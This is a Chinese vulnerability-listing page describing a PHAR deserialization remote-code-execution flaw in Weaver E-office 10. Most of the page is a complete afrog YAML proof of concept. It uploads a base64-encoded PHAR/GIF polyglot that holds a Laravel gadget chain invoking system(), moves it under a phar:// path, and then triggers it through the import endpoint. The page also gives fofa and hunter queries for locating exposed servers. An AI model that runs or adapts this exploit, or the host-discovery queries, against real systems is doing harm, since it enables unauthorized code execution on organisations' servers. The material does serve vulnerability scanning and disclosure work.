e-office10-atuh-file-phar-deserialization-rce: 泛微E-office 10 atuh-file存在phar反序列化漏洞

日期: 2025-09-01 | 影响软件: e-office | POC: 已公开

漏洞描述

泛微E-office 10 处理上传的PHAR文件时存在缺陷。攻击者能够上传伪装的PHAR文件到服务器，利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。 hunter：web.body="eoffice10"&&web.body="eoffice_loading_tip" fofa: app="泛微-EOffice" && body="eoffice_loading_tip" && body="eoffice10"

PoC代码[已公开]

id: e-office10-atuh-file-phar-deserialization-rce

info:
  name: 泛微E-office 10 atuh-file存在phar反序列化漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    泛微E-office 10 处理上传的PHAR文件时存在缺陷。攻击者能够上传伪装的PHAR文件到服务器，利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。 
    hunter：web.body="eoffice10"&&web.body="eoffice_loading_tip"
    fofa: app="泛微-EOffice" && body="eoffice_loading_tip" && body="eoffice10"
  reference:
    - https://mp.weixin.qq.com/s/RDyadHPXgGa4ABK4M1RMPQ
    - https://mp.weixin.qq.com/s/zFQ1DZZojm3ww1jq0ReVhw
  tags: e-office,phar,rce,deserialization
  created: 2024/12/17

set:
  boundary: randomLowercase(8)
  payload: base64Decode("R0lGODlhPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQpEAQAAAQAAABEAAAABAAAAAAAOAQAATzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjE6e3M6MTY6IgAqAHF1ZXVlUmVzb2x2ZXIiO3M6Njoic3lzdGVtIjt9czo4OiIAKgBldmVudCI7TzozODoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcQnJvYWRjYXN0RXZlbnQiOjE6e3M6MTA6ImNvbm5lY3Rpb24iO3M6Mzc6ImVjaG8gOXlNODZFU3lGQlhORHdDaDZOYnN4eTl3cmNRclAyNVAiO319CAAAAHRlc3QudHh0BAAAAEvbA2YEAAAADH5/2KQBAAAAAAAAdGVzdIEpwGmDhmYzxumoAjJwcaz4EdU+AgAAAEdCTUI=")
rules:
  r0:
    request:
      method: POST
      path: /eoffice10/server/public/api/attachment/atuh-file
      headers:
        Content-Type: multipart/form-data; boundary={{boundary}}
      body: "--{{boundary}}\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"register.inc\"\r\nContent-Type: image/jpeg\r\n\r\n{{payload}}\r\n--{{boundary}}--"
    expression: response.status == 200 && response.body.bcontains(b'"attachment_id":')
    output:
      search: '"\"attachment_id\":\"(?P<attachment_id>.+?)\",".bsubmatch(response.body)'
      attachment_id: search["attachment_id"]
  r1:
    request:
      method: POST
      path: /eoffice10/server/public/api/attachment/path/migrate
      body: source_path=&desc_path=phar%3A%2F%2F..%2F..%2F..%2F..%2Fattachment%2F
    expression: response.status == 200 && response.body.bcontains(b'"status":1')
  r2:
    request:
      method: POST
      path: /eoffice10/server/public/api/empower/import
      body: type=tttt&file={{attachment_id}}
    expression: response.status == 200 && response.body.bcontains(b'9yM86ESyFBXNDwCh6Nbsxy9wrcQrP25P') && response.body.bcontains(b'"code":"no_file"')
expression: r0() && r1() && r2()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/e-office10-atuh-file-phar-deserialization-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

泛微 E-Office /E-mobile/create/ajax_do.php 存在SQL注入漏洞 无POC

泛微 E-Office /E-mobile/diarydo.php存在SQL注入漏洞 无POC

CNVD-2021-49104: 泛微OA E-Office UploadFile.php 任意文件上传漏洞 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

泛微 E-Office /E-mobile/create/ajax_do.php 存在SQL注入漏洞无POC

泛微 E-Office /E-mobile/diarydo.php存在SQL注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC